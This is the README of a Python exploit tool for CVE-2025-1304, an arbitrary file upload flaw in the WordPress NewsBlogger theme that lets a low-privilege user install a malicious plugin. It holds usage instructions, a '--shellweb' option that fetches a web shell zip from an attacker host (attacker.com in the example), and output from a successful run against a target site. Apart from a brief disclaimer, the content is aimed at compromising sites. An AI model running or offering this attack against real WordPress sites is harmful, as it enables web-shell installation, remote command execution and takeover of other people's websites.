
# 🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - Arbitrary File Upload (CVE-2025-1304)

**CVSS Score:** 8.8 (High)  
**Vulnerability Type:** Arbitrary File Upload  
**Component:** WordPress Theme  
**CVE ID:** CVE-2025-1304  

---

## 🔥 Vulnerability Overview

The `NewsBlogger` WordPress theme (versions <= 0.2.5.1) is vulnerable to an **Arbitrary File Upload** via the admin welcome panel.

This vulnerability allows any authenticated user — including those with the minimal **Subscriber** role — to upload a malicious `.zip` archive containing a web shell.  
The upload occurs through an unvalidated plugin URL field, which fails to properly verify the content or type of the uploaded file.

A successful attack could lead to full compromise of the website, including remote command execution and privilege escalation.

---

## 🧠 Script Details

This Python script automates the exploitation of the vulnerability by:
- Logging in using supplied admin credentials.
- Extracting the `nonce` dynamically from the vulnerable welcome page.
- Uploading a remote malicious plugin via the vulnerable AJAX endpoint.

---

## ⚙️ Usage Instructions

```bash
python CVE-2025-1304.py -h
```

```text
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
```

---

## 📤 Example Output

```text
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
```

---

## ⚠️ Disclaimer

This code is provided for **educational and authorized security testing** purposes only.  
The author assumes no responsibility for any misuse or damage caused by this tool.

---

*By: Nxploited ( Khaled Alenazi)*
